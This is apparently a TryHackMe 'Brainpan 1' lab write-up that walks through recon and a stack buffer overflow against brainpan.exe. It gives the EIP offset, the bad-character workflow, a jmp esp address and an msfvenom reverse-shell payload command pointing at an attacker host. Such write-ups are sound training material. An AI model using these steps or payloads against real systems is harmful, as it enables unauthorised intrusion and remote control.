WriteUp THM-Brainpan 1
Brainpan is perfect for OSCP practice and has been highly recommended to complete before the exam. Exploit a buffer overflow vulnerability by analyzing a Windows executable on a Linux machine. If you get stuck on this machine, don’t give up (or look at writeups), just try harder.
This is a writeup for TryHackMe room Brainpan 1.
Reconnaissance
Let’s start with a nmap scan:
nmap -sC -sV -p- 10.10.141.199
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-10 19:16 EET
Nmap scan report for 10.10.141.199
Host is up (0.055s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
...
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)There is a password prompt on port 9999 that we can connect to using
nc 10.10.141.199 9999
On port 1000 is a http server. Let’s do a directory scan:
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -u http://10.10.141.199:10000 -x php,html,txt dirGobuster identifies a single directory /bin and there is a single file brainpan.exe. Let’s open it using Cutter and examine. Looking at the main program it seems to be the same program that is running on the other port. Let’s see if we can reverse the password.
Ok this is easy as a pie. Just look at the _get_reply() function disassembly.
Let’s enter shitstorm to the program and see what it does. It displays access granted but the program exits, like it should do.
So I think this calls for a buffer overflow with a shellcode. Let’s see how long string it takes to crash the program. I use binary search with varying lengths and generate buffers using:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 800518 is the largest input that doesn’t crash the program.
Looking at the code it accepts up to 1000 bytes from the socket:
_recv@16(var_5b0h, &var_3f8h, 1000, 0);Let’s figure out how big the buffer var_3f8h actually is. Since it is memset() to zero in main I’m thinking it overflows somewhere else. Looking at the _get_reply() function there is a strcpy() with the destination defined as
var char *dest @ ebp-0x208 # 520 dec
So the goal is to craft a buffer which fits into the 1000 bytes that is read from the socket and overflows the buffer so that we can control the execution. Since the web app doesn’t give us debug info we need to analyze the binary locally. Time to finally learn Immunity Debugger I guess.
Initial entry
After learning how to do buffer overflows from another TryHackMe room Buffer Overflow Prep it’s time to apply those skills to this binary. After opening the binary in Immunity Debugger I set the working folder.
!mona config -set workingfolder c:\mona\%pI then create a repeating pattern and enter it to the exploit program.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000After the process crashes I figure out the offset where the EIP is overwritten:
!mona findmsp -distance 1000
Now we know what the EIP offset needs to be 524. Confirm by using a test buffer and verify that EIP is 42424242 (see below for the final exploit code):
offset = 524
overflow = "A" * offset
retn = "BBBB"Next we need to figure out what characters cannot be in the payload. We already know that zero byte is out of the question so let’s test with that first:
Create a bytearray in mona:
!mona bytearray -b "\x00"Use the same array (badchars array in exploit code) in payload from the Python script and after crash check for more bad bytes using ESP address:
!mona compare -f c:\mona\brainpan\bytearray.bin -a 0023F920
There are no more bad bytes so now what we have left to do is to find out a jump address that transfers execution to our payload. We could control EIP manually but there might be zero bytes in the instruction so that would not be copied over. Use mona to find jump address:
!mona jmp -r esp -cpb "\x00"
Which returns a single address:
Log data, item 3
Address=311712F3
Message= 0x311712f3 : jmp esp | {PAGE_EXECUTE_READ} [brainpan.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\Jari\Desktop\brainpan.exe)Next we craft the reverse shell payload.
msfvenom -p windows/shell_reverse_tcp LHOST=10.8.108.247 LPORT=4444 EXITFUNC=thread -b “\x00” -f pyAnd finally combine everything into the exploit program:
By running this we get a reverse shell to the box.